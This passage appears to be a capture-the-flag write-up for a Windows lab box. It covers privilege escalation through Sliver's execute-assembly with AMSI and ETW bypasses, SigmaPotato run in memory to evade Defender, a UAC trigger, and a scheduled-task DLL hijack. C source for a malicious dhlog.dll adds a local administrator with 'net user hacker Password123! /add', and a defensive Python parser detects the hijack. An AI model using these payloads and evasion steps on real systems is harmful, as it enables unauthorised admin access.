SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
```

And because Defender is on and can catch any exploitation tool, we can use execute-assembly with Sliver.

execute-assembly loads a .NET binary directly into memory without writing it to disk (so Defender isn't alerted), with options like --amsi-bypass to disable the scan interface so the code runs without runtime scanning, and --etw-bypass just in case. (For this we only needed the first, I guess, because without it it throws 0x8007000b, which is a compatibility issue, meaning this .NET version isn't compatible.)

Now when it comes to the exploit we'll use, I tried a lot and nothing worked until Claude recommended SigmaPotato, and here is why:

Standard Potato binaries must usually be uploaded to the victim's disk, which immediately risks triggering AV alerts. SigmaPotato adds robust support for .NET Reflection, allowing an operator to load the entire tool directly into the memory of an existing process. Running it "fileless" leaves no footprint on the hard drive and bypasses static file scanners

And as you can see we added the user as an administrator.

Validating the user addition; now we can log in via WinRM and get the flag:

```plaintext
[127.0.0.1] sliver (ELDERLY_SUMMER) > shell


[*] Shell management: `shell ls`, `shell attach <id>`
[*] Escape: press Ctrl-] to return to the Sliver client
[*] Opening shell tunnel ...

[*] Started remote shell [1] with pid 1220


PS C:\Windows\system32>
PS C:\Windows\system32> net user
net user

User accounts for \\EC2AMAZ-0536LUM

-------------------------------------------------------------------------------
Administrator            DefaultAccount           dh_admin
Guest                    jimmex                   kioskuser
svcuser                  vdiuser                  WDAGUtilityAccount
The command completed successfully.
```

Using runas from PowerShell does the trick.

The normal runas won't work because our token will still be limited; we have to trigger UAC as the jimmex user so we can get full privileges.

And it worked, as you can see, and the way I triggered UAC was by using Start-Process powershell.exe -Verb RunAs

Reading the flag, it mentions something about a DLL hijack.

Alternative way to Administrator

There is this logs directory that we didn't have access to earlier, but now we can read it:

```powershell
PS C:\DarkhavenTools> dir
dir


    Directory: C:\DarkhavenTools


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/8/2026 1:34 PM logs
-a---- 3/8/2026 1:17 PM 5120 DarkhavenHealthCheck.exe
```

There is a scheduled task running this health check binary, which looks for dhlog.dll and doesn't find it. Now that we can write that DLL, we can hijack the load, and whoever runs the health check is who we'll run as.

```plaintext
[2026-06-17 22:35:15] Checking for plugin: C:\DarkhavenTools\logs\dhlog.dll
[2026-06-17 22:35:15] Plugin not found, skipping
[2026-06-17 22:35:15] Health check complete
[2026-06-17 22:36:15] Health check started
[2026-06-17 22:36:15] Checking for plugin: C:\DarkhavenTools\logs\dhlog.dll
[2026-06-17 22:36:15] Plugin not found, skipping
[2026-06-17 22:36:15] Health check complete
```

I wrote dhlog.c just to find out who is running the task and dump it into a file:

```c
// dhlog.c: record which account the health check loads this plugin as
#include <windows.h>
#include <stdlib.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD reason, LPVOID lpReserved) {
    if (reason == DLL_PROCESS_ATTACH) {
        // runs once when the health check loads the DLL; write the account
        // name to a file in the logs directory so it can be read back later
        system("whoami > C:\\DarkhavenTools\\logs\\whoami.txt");
    }
    return TRUE;
}
```

Then compile it:

```bash
┌─[]─[10.200.65.74]─[jimmex@attacker]─[~/hacksmarter/kiosk]
└──╼ [★]$ x86_64-w64-mingw32-gcc -shared -o dhlog.dll dhlog.c
```

Now we see that the DLL is loaded and Administrator is the one who runs that task:

```plaintext
[2026-06-17 22:47:15] Loading plugin: C:\DarkhavenTools\logs\dhlog.dll
[2026-06-17 22:47:15] Plugin loaded successfully
[2026-06-17 22:47:15] Health check complete
PS C:\DarkhavenTools\logs> cat whoami.txt
cat whoami.txt
ec2amaz-0536lum\administrator
```
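The two log excerpts above (plugin missing at 22:35 and 22:36, loaded at 22:47) are exactly the pattern a defender can alert on: a privileged task probing a path that lower-privileged users can write to, and a DLL appearing there after the task was already running. As an added example that is not part of the writeup, here is a parser for that health-check log which flags a plugin path that was reported missing and later loaded; the log text is constructed from the lines quoted above.

```python
import re
from datetime import datetime

# Constructed from the log lines quoted above: two runs before the DLL existed,
# one after it was dropped into C:\DarkhavenTools\logs.
SAMPLE_LOG = """\
[2026-06-17 22:35:15] Health check started
[2026-06-17 22:35:15] Checking for plugin: C:\\DarkhavenTools\\logs\\dhlog.dll
[2026-06-17 22:35:15] Plugin not found, skipping
[2026-06-17 22:35:15] Health check complete
[2026-06-17 22:36:15] Health check started
[2026-06-17 22:36:15] Checking for plugin: C:\\DarkhavenTools\\logs\\dhlog.dll
[2026-06-17 22:36:15] Plugin not found, skipping
[2026-06-17 22:36:15] Health check complete
[2026-06-17 22:47:15] Health check started
[2026-06-17 22:47:15] Loading plugin: C:\\DarkhavenTools\\logs\\dhlog.dll
[2026-06-17 22:47:15] Plugin loaded successfully
[2026-06-17 22:47:15] Health check complete
"""

LINE_RE = re.compile(r"^\[(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\] (?P<msg>.*)$")
PROBE_RE = re.compile(r"^Checking for plugin: (?P<path>.+)$")
LOAD_RE = re.compile(r"^Loading plugin: (?P<path>.+)$")


def parse_log(log_text: str):
    """Yield (timestamp, message) for each well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), m["msg"]


def plugin_history(log_text: str) -> dict:
    """Per plugin path: when it was first probed, how many runs reported it
    missing, and when it first loaded (None if never)."""
    history, pending = {}, None
    for ts, msg in parse_log(log_text):
        if m := PROBE_RE.match(msg):
            history.setdefault(m["path"], {"first_probe": ts, "missing": 0, "first_load": None})
            pending = m["path"]  # the next "not found" line refers to this path
        elif msg.startswith("Plugin not found") and pending is not None:
            history[pending]["missing"] += 1
            pending = None
        elif m := LOAD_RE.match(msg):
            entry = history.setdefault(m["path"], {"first_probe": ts, "missing": 0, "first_load": None})
            if entry["first_load"] is None:
                entry["first_load"] = ts
            pending = None
    return history


def suspicious_plugin_loads(log_text: str) -> list[tuple[str, datetime]]:
    """Plugins that were missing on earlier runs and then loaded: a DLL that
    appeared in the probed directory after the task was already running."""
    return [(path, h["first_load"]) for path, h in plugin_history(log_text).items()
            if h["missing"] > 0 and h["first_load"] is not None]


if __name__ == "__main__":
    for path, when in suspicious_plugin_loads(SAMPLE_LOG):
        print(f"{when:%Y-%m-%d %H:%M:%S} plugin appeared and was loaded: {path}")
```

The root cause is the task running as Administrator while probing a directory a lower-privileged account can write to; tightening the ACL on C:\DarkhavenTools\logs or moving the plugin path removes the hijack, and this check catches the window in which it was abused.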

I ended up adding another user as administrator:

```c
// dhlog.c: the version that adds a local administrator when the task loads it
#include <windows.h>
#include <stdlib.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD reason, LPVOID lpReserved) {
    if (reason == DLL_PROCESS_ATTACH) {
        system("net user hacker Password123! /add && net localgroup administrators hacker /add");
    }
    return TRUE;
}
```

Then using the same technique as before, prompting UAC from PowerShell, we can get the flag.

I just wanted to run ProcMon, and as you can see it loads dhlog.dll.

And here is the actual task that runs the binary every minute as Administrator.

Resources